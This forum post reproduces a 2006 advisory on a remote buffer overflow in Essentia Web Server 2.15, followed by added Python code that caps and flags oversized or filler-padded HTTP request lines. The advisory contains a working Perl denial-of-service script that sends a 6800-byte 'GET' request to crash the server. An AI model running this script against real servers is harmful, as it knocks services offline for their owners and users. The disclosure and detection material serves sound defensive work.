escalation666 Posted November 10, 2006

Essentia Web Server V 2.15
Author: CorryL
x0n3-h4ck.org

-=[-----------------------------------------------]=-
-=[+] Application: Essentia Web Server
-=[+] Version: 2.15
-=[+] Vendor's URL: http://www.essencomp.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: http://www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL

..::[ Description ]::..

Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.

..::[ Bug ]::..

This software is affected by a buffer overflow that would allow an attacker to execute arbitrary code on the victim system.
Sending a GET + A x 6800 request, he would succeed in writing over the SEH pointer.

..::[ Proof Of Concept ]::..

#!/usr/bin/perl
use IO::Socket;
use Getopt::Std;

# -h <host>: target to connect to on port 80
getopts('h:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit ]=-\n";
print STDERR "-=[ Discovered By CorryL corryl80@gmail.com ]=-\n";
print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) { Usage(); }

# 6800-byte filler that overruns the request-line buffer
$dos = "A" x 6800;

print "[+] Connect to $host\n";
$socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp');
die unless $socket;

print "[+] Sending DOS byte\n";
$data = "GET /$dos \r\n\r\n";
print $socket $data;   # send the oversized request line
close($socket);

sub Usage {
    print STDERR "Usage: $0 -h <host>\n";
    exit(1);
}

..::[ Workaround ]::..

nothing

..::[ Disclosure Timeline ]::..

[30/10/2006] - Vendor notification
[04/11/2006] - No Vendor Response
[04/11/2006] - Public disclosure
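The advisory gives no workaround, but the bug class it describes (an unbounded request line copied into a fixed buffer until the SEH record is overwritten) has a standard defensive answer: cap the request line before it is ever parsed, and flag request lines that are either oversized or made of one repeated filler byte. The following Python is an added example written for this post; it is not code from the advisory, from CorryL, or from the Essentia vendor. The 4096-byte URI limit and the 256-byte filler-run threshold are assumed values chosen for illustration, and the sample request lines are constructed here (one of them is shaped like the advisory's 6800-byte payload).

```python
"""Bounded request-line reading and detection of overlong or filler-padded
HTTP request lines, illustrating the mitigation and detection for the
advisory above.  Example code; thresholds and samples are assumptions."""
import io
import re
from dataclasses import dataclass

# Assumed policy limits (not from the advisory).  6800 is the advisory's
# payload size; mainstream servers cap the whole request line near 8 KB,
# so a 4096-byte URI limit is conservative without breaking normal traffic.
MAX_URI_LEN = 4096
MIN_FILLER_RUN = 256  # one byte repeated this often is treated as padding


@dataclass
class Finding:
    reason: str
    uri_len: int


def bounded_readline(stream, limit=MAX_URI_LEN + 64):
    """Read one line, refusing to buffer more than `limit` bytes with no newline.

    Rejecting before parsing is the fix for this bug class: the server never
    copies an attacker-sized request line into a fixed buffer."""
    buf = bytearray()
    while len(buf) < limit:
        b = stream.read(1)
        if not b or b == b"\n":
            return bytes(buf + b)
        buf += b
    raise ValueError("request line exceeds %d bytes" % limit)


def line_is_accepted(data: bytes) -> bool:
    """True if `bounded_readline` would accept `data` as a request line."""
    try:
        bounded_readline(io.BytesIO(data))
        return True
    except ValueError:
        return False


def parse_request_line(line: bytes):
    """Split 'METHOD SP Request-URI [SP HTTP-Version] CRLF' tolerantly.

    The PoC omits the HTTP-Version token, so it is optional here."""
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) < 2:
        return None
    version = parts[2] if len(parts) > 2 else b""
    return parts[0], parts[1], version


def inspect_request_line(line: bytes):
    """Return a Finding when a request line looks like an overflow attempt."""
    parsed = parse_request_line(line)
    if parsed is None:
        return Finding("unparseable request line", len(line))
    method, uri, version = parsed
    if len(uri) > MAX_URI_LEN:
        return Finding("request-URI exceeds MAX_URI_LEN", len(uri))
    # A long run of one repeated byte is the signature of filler payloads
    # such as the "A" x 6800 in the advisory.
    m = re.search(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), uri)
    if m:
        return Finding("run of %d repeated 0x%02x bytes" % (len(m.group(0)), m.group(1)[0]), len(uri))
    if version and not version.startswith(b"HTTP/"):
        return Finding("bad HTTP-Version token", len(uri))
    return None


# Constructed sample request lines (not captured traffic).
SAMPLE_REQUEST_LINES = [
    b"GET /index.html HTTP/1.1\r\n",                      # benign
    b"GET /" + b"A" * 6800 + b" \r\n",                     # shaped like the PoC
    b"GET /" + b"B" * 300 + b" HTTP/1.0\r\n",              # short, but filler run
    b"GET /search?q=" + b"x" * 100 + b" HTTP/1.1\r\n",     # long-ish but benign
]


def scan(lines):
    """Return (index, Finding) pairs for every suspicious request line."""
    hits = []
    for i, line in enumerate(lines):
        finding = inspect_request_line(line)
        if finding is not None:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_REQUEST_LINES):
        print("line %d: %s (uri_len=%d)" % (idx, f.reason, f.uri_len))
    print("PoC-shaped line accepted by bounded reader:",
          line_is_accepted(SAMPLE_REQUEST_LINES[1]))
```

`bounded_readline` is the server-side control (the request line is cut off at a fixed size before any parsing or copying), while `inspect_request_line` is the detection side, suitable for running over access-log request fields or a proxy's inbound stream; the two checks are independent so that a request under the length cap but padded with a single repeated byte is still surfaced.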